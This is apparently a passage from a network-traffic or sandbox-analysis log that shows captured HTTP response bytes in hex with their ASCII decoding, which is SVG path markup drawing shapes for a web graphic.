                                                                                                                                                                                                                                                        Data Ascii: ></path><path class="cls-4" d="M816.44,307.58a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7359INData Raw: 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 35 2e 39 32 2c 32 32 36 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c
                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1-.15-2.81"></path><path class="cls-4" d="M785.92,226.58a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7375INData Raw: 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22
                                                                                                                                                                                                                                                        Data Ascii: 81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7391INData Raw: 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 38 34 2c 31 35 38 2e 34 37 41 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 35 34 31 2c 31 36 31 61 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 18,3.18"></path><path class="cls-7" d="M541.84,158.47A1.92,1.92,0,0,1,541,161a2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7407INData Raw: 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36
                                                                                                                                                                                                                                                        Data Ascii: ,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7423INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 34 36 2c 31 34 38 2e 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M596.46,148.9a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7439INData Raw: 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e
                                                                                                                                                                                                                                                        Data Ascii: 79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17">
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7455INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 31 2e 30 37 2c 31 33 39 2e 33 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M651.07,139.33a1.91,1.91,0,0,1-.86,2.48,2.8,2.8,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7471INData Raw: 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: 9,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7487INData Raw: 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 36 39 2c 31 32 39 2e 37 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,3.18"></path><path class="cls-7" d="M705.69,129.75a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7503INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.34,2.34,0,0,1,.17,3.17"></path><path class="cls-7" d="M740.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7519INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 33 31 2c 31 32 30 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30
                                                                                                                                                                                                                                                        Data Ascii: lass="cls-7" d="M760.31,120.18a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7535INData Raw: 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: .12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7568INData Raw: 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 39 32 2c 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22
                                                                                                                                                                                                                                                        Data Ascii: 3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M688.92,233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9"
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7584INData Raw: 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 33 32 39 2e 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                        Data Ascii: 2.63,0,0,1,0,3.57"></path><path class="cls-9" d="M723.35,329.6a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7600INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 38 2c 34 32 35 2e 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35
                                                                                                                                                                                                                                                        Data Ascii: ="cls-9" d="M757.78,425.4a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.5
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7616INData Raw: 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32
                                                                                                                                                                                                                                                        Data Ascii: ,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7632INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                        Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class=
